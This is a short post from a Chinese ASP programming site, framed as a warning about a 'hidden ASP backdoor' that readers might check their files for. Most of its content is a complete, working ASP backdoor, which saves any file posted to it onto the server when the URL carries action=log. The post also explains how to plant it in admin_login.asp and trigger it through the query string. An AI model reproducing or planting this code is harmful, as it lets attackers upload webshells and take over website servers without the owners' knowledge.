Asp编程
搜索
分类

隐蔽的ASP后门 大家可以查看下

时间:2010-08-05 21:26:00 

这段后门代码可以隐藏在asp文件中,大家可以搜索一些特点的关键字,查看文件的修改日期,看看是不是有如下的代码。

<%if request.QueryString("action")="log" then 
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> 
<%end if%> 

比如编辑在“admin_login.asp”下

以后只需要输入“admin_login.asp?action=log”即可

标签:后门,asp
0
投稿

猜你喜欢

  • WEB2.0网页制作标准教程(2)什么是名字空间

    2007-11-13 13:04:00

  • asp ajax注册验证之 防止用户名输入空格

    2011-03-11 11:17:00

  • IE中选择符的4095限制

    2009-10-09 13:25:00

  • jQuery技巧

    2009-09-27 12:28:00

  • Asp测试网速代码(带进度条)

    2007-11-12 13:09:00

  • 《写给大家看的设计书》阅读笔记之对齐原则

    2009-07-09 16:32:00

  • 异步加载Google Adsense 更新到Wordpress 2.62

    2008-09-11 13:09:00

  • Web设计的成就感

    2009-09-04 19:02:00

  • TXT.WORD文档下载另存为,而不是在浏览器中打开

    2007-10-25 11:43:00

  • Linux操作系统中如何安装MySQL数据库

    2007-10-26 15:58:00

  • 最简洁的asp多重查询的解决方案

    2011-04-15 10:50:00

  • WEB打印分页类(JS)

    2008-01-22 14:02:00

  • 怎样在SQL Server 2005中用证书加密数据

    2009-01-04 14:11:00

  • [译]图片优化 第五章:AlphaImageLoader

    2010-08-29 18:39:00

  • 9个Web设计中常见的可用性错误[译]

    2009-03-11 20:25:00

  • 历数Firefox2.0对XML处理的改进

    2007-11-27 12:41:00

  • 教你怎么使用sql游标实例分享

    2012-07-11 16:14:57

  • 如何把数据库的记录输出到表格去?

    2009-11-06 13:37:00

  • oracle下实现恢复一个丢失的数据文件的代码

    2009-03-02 11:02:00

  • 如何改良你的CSS代码编写结构

    2008-09-29 16:03:00
    • asp之家 网络编程 m.aspxhome.com